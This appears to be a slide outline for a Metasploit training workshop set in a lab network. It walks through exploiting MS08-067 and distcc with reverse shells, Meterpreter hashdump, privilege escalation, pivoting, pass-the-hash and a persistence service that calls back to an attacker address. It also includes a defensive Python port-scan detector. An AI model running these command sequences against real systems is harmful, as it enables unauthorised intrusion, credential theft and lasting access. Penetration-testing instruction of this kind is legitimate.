1. An introduction to Metasploit basics, terminology, and interfaces like Msfconsole.
2. A demonstration of exploiting vulnerabilities using Metasploit modules and payloads like Meterpreter.
3. A discussion of post-exploitation techniques in Metasploit like privilege escalation, lateral movement, and maintaining access.
2. Acknowledgements
• Metasploit Team
• Offensive Security/Metasploit Unleashed
• Hackers for Charity
• David Kennedy
• BSides Delaware Crew
• Darren
3. Agenda
• Metasploit Basics
– Some terminology/brief intro to pentesting
– How Metasploit works
– Interacting with Metasploit
• Basic Exploitation
– Exploiting a vulnerability using Metasploit console
• Using Meterpreter
– Using the Meterpreter shell for post exploitation
4. Agenda
• Metasploit in a penetration test
– Information Gathering
– Vulnerability Scanning
– Exploitation in depth
– Post exploitation
– Reporting
• Hack some stuff
– Pop my boxes
6. What’s in the lab?
• Windows XP SP2
– IP address: 192.168.20.22
• Ubuntu Linux 8.04 (Metasploitable)
– IP address: 192.168.20.23
Others below .100 (.100 and above are you guys)
7. What is Penetration Testing?
Simulation of a real attack
Get out of jail free card for exploiting systems
Report to customers with findings and recommendations
Find and remediate vulnerabilities before attackers exploit them
9. Metasploit Terminology
Exploit: vector for penetrating the system
Payload: shellcode, what you want the exploit to do
Encoders: encode or mangle payload
Auxiliary: other modules besides exploitation
Session: connection from a successful exploit
11. Exploitation Streamlining
• Traditional Pentest:
– Find public exploit
– Change offsets and return address for your target
– Replace shellcode
• Metasploit:
– Load Metasploit module
– Select target OS
– Set IP addresses
– Select payload
12. Using Msfconsole: Exploitation
use <module> - sets the exploit/auxiliary/etc. module to use
set <option> <value> - set a parameter
setg <option> <value> - set a parameter globally
show <x> - lists all available x (payloads, options, ...)
exploit - runs the selected module
13. Windows Exploitation Example
search windows/smb
info windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.20.22 (set other options as well)
exploit
14. MSFcli Exploitation Example
./msfcli <exploit> <option=x> E
Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E
E = exploit
O = show options
P = show payloads
15. Linux Exploitation Example
search distcc
use unix/misc/distcc_exec
show payloads
set payload cmd/unix/reverse
show options
set rhost 192.168.20.23
set lhost 192.168.20.102 (your ip)
exploit
17. Meterpreter
Gain a session using a meterpreter payload
Memory based/never hits the disk
Everything a shell can do plus extra
18. Meterpreter Commands
help - shows all available commands
background - backgrounds the session
ps - shows all processes
migrate <process id> - moves meterpreter to another process
getuid - shows the user
19. Meterpreter Commands
download <file> - pulls a file from the victim
upload <file on attacker> <file on victim> - pushes a file to the victim
hashdump - dumps the hashes from the SAM
shell - drops you in a shell
20. Exercise
In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.
Experiment with different payloads and meterpreter commands.
21. Information Gathering
Learning as much about a target as possible
Examples: open ports, running services, installed software
Identify points for further exploration
22. Metasploit and Databases
Metasploit supports MySQL and PostgreSQL
/etc/init.d/postgresql-8.4 start (starts PostgreSQL)
msf > db_connect postgres:password@127.0.0.1/metasploit (connects to the database server and creates the database metasploit)
23. Portscanning
Queries a host to see if a program is listening
Ex: Browsing to a website – webserver listens on port 80
Listening ports are accessible by an attacker and if vulnerable may be used for exploitation
Ex: ms08_067_netapi exploits smb on port 445
24. Metasploit and nmap
Port scanning and just about everything else
http://nmap.org/ and man nmap
Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan of hosts 192.168.20.20 to .99, output in all three formats, normal, XML and grepable, with the base name subnet1)
msf > db_import subnet1.xml
25. MSF Auxiliary Portscanners
msf > search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP syn scan)
Use auxiliary modules like exploits (use, set, exploit, etc.)
26. Some Other MSF Scanners
scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version)
scanner/ssh/ssh_version (queries the ssh version)
scanner/ftp/anonymous (anonymous ftp login)
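Seen from the defender's side, the scans in slides 23 to 26 leave two patterns in connection logs: one source hitting many ports on one host (the portscan modules, nmap -sV) and one source probing the same port on many hosts (a version scanner such as smb_version run across a range). This added example, not from the slides, detects both with a sliding time window over constructed log lines in a simple key=value layout; that layout, the thresholds and the function names are this example's own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection-log lines (not real traffic). The key=value layout,
# the addresses and the thresholds below are this example's own assumptions.
SAMPLE_LOG = """\
2017-01-21T10:00:00 src=192.168.20.102 dst=192.168.20.22 dport=21 proto=tcp
2017-01-21T10:00:00 src=192.168.20.102 dst=192.168.20.22 dport=22 proto=tcp
2017-01-21T10:00:01 src=192.168.20.102 dst=192.168.20.22 dport=25 proto=tcp
2017-01-21T10:00:01 src=192.168.20.102 dst=192.168.20.22 dport=80 proto=tcp
2017-01-21T10:00:01 src=192.168.20.102 dst=192.168.20.22 dport=135 proto=tcp
2017-01-21T10:00:02 src=192.168.20.102 dst=192.168.20.22 dport=139 proto=tcp
2017-01-21T10:00:02 src=192.168.20.102 dst=192.168.20.22 dport=445 proto=tcp
2017-01-21T10:00:02 src=192.168.20.102 dst=192.168.20.22 dport=3389 proto=tcp
2017-01-21T10:05:00 src=192.168.20.103 dst=192.168.20.20 dport=445 proto=tcp
2017-01-21T10:05:00 src=192.168.20.103 dst=192.168.20.21 dport=445 proto=tcp
2017-01-21T10:05:01 src=192.168.20.103 dst=192.168.20.22 dport=445 proto=tcp
2017-01-21T10:05:01 src=192.168.20.103 dst=192.168.20.23 dport=445 proto=tcp
2017-01-21T10:05:02 src=192.168.20.103 dst=192.168.20.24 dport=445 proto=tcp
2017-01-21T10:05:02 src=192.168.20.103 dst=192.168.20.25 dport=445 proto=tcp
2017-01-21T10:10:00 src=192.168.20.50 dst=192.168.20.23 dport=22 proto=tcp
2017-01-21T11:10:00 src=192.168.20.50 dst=192.168.20.23 dport=80 proto=tcp
2017-01-21T12:10:00 src=192.168.20.50 dst=192.168.20.23 dport=443 proto=tcp
this line is malformed and must be skipped by the parser
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
                     r"dport=(?P<dport>\d+) proto=(?P<proto>\w+)$")


def parse_log(text):
    """Turn matching lines into (timestamp, src, dst, dport) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a production pipeline would count these
        events.append((datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"])))
    return sorted(events)


def detect_scans(events, window=timedelta(seconds=60), min_ports=5, min_hosts=5):
    """Per source, slide a time window over its connections and raise
    'vertical' when >= min_ports distinct ports on one host fall inside it,
    'horizontal' when >= min_hosts distinct hosts on one port do.
    Returns sorted (kind, src, target, peak count) tuples, one per kind/src/target."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev[1]].append(ev)
    alerts = {}
    for src, evs in by_src.items():
        start = 0
        for end, (ts, _, dst, dport) in enumerate(evs):
            while ts - evs[start][0] > window:
                start += 1  # drop connections older than the window
            in_win = evs[start:end + 1]
            ports_on_dst = {p for _, _, d, p in in_win if d == dst}
            hosts_on_port = {d for _, _, d, p in in_win if p == dport}
            if len(ports_on_dst) >= min_ports:
                key = ("vertical", src, dst)
                alerts[key] = max(alerts.get(key, 0), len(ports_on_dst))
            if len(hosts_on_port) >= min_hosts:
                key = ("horizontal", src, f"port {dport}")
                alerts[key] = max(alerts.get(key, 0), len(hosts_on_port))
    return sorted((k, s, t, n) for (k, s, t), n in alerts.items())


if __name__ == "__main__":
    for kind, src, target, count in detect_scans(parse_log(SAMPLE_LOG)):
        print(f"{kind:10} scan from {src} against {target} ({count} distinct)")
```

The third source, 192.168.20.50, touches three ports on one host hours apart and stays below the window, which is the kind of ordinary traffic a fixed count without a time window would misreport.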
27. Vulnerability Scanning
Query systems for potential vulnerabilities
Identify potential methods of penetration
Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
28. Metasploit and Nessus
Tenable's Vulnerability Scanner (http://www.nessus.org)
msf > load nessus
msf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok)
msf > nessus_policy_list
msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)
msf > nessus_report_list
msf > nessus_report_get <report id>
29. Metasploit Vulnerability Scanners
SMB Login
Given a set of credentials what systems can they access?
scanner/smb/smb_login
Open VNC and X11
If misconfigured may be accessible without credentials
scanner/vnc/vnc_none_auth
scanner/x11/open_x11
30. Using Msfconsole: Exploitation
use <module> - sets the exploit/auxiliary/etc. module to use
set <option> <value> - set a parameter
setg <option> <value> - set a parameter globally
show <x> - lists all available x (payloads, options, ...)
exploit - runs the selected module
32. db_autopwn
By default just runs all the exploits that match a given open port
Not stealthy
Using vulnerability data can be made smarter, matches vulnerabilities instead of ports
db_autopwn -x -e
33. Attacking MSSQL
MSSQL TCP port can change, UDP port is 1434
msf > search mssql (shows all mssql modules)
msf > use scanner/mssql/mssql_ping (queries UDP 1434 for information including the TCP port)
msf > use scanner/mssql/mssql_login (tries passwords to log into mssql)
msf > use windows/mssql/mssql_payload (logs into mssql and gets a shell)
34. We have a shell, now what?
Privilege escalation
Local information gathering
Exploiting additional hosts
Maintaining access
Forensic avoidance
35. Meterpreter: Privilege Escalation
A session has the privileges of the exploited process
getuid (tells you what user your session is running as)
getsystem (tries various techniques to escalate privileges)
36. Meterpreter: Enabling Remote Desktop
Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group
run getgui -e
37. Meterpreter: Migrating
If the process that hosts meterpreter closes, meterpreter dies too
Example: client side exploit residing in the browser
meterpreter > ps (shows all processes)
meterpreter > migrate <process id> (moves to a new process)
38. Meterpreter: Searching for Content
Look for specific interesting files on the exploited system
search -h
Example: search -f *.jpg (finds all the porn)
39. Pivoting
Scenario: Exploit a dual networked host, with a routable interface and a non-routable one. Can we attack other hosts on the non-routable interface without SSH tunneling?
route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1)
Now you can portscan, exploit, etc. the non-routable subnet
40. PSExec
hashdump (dumps the hashes, not always easy to crack)
Why not just pass the hash to other systems?
use windows/smb/psexec
set SMBPass to the hash
41. Meterpreter: Persistence
Persistence script installs a meterpreter service
Meterpreter comes back when the box restarts
Ex: run persistence -U -i 5 -p 443 -r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
42. Exercises
Perform a penetration test on the Windows and Linux systems we used in class
Perform a penetration test on the lab network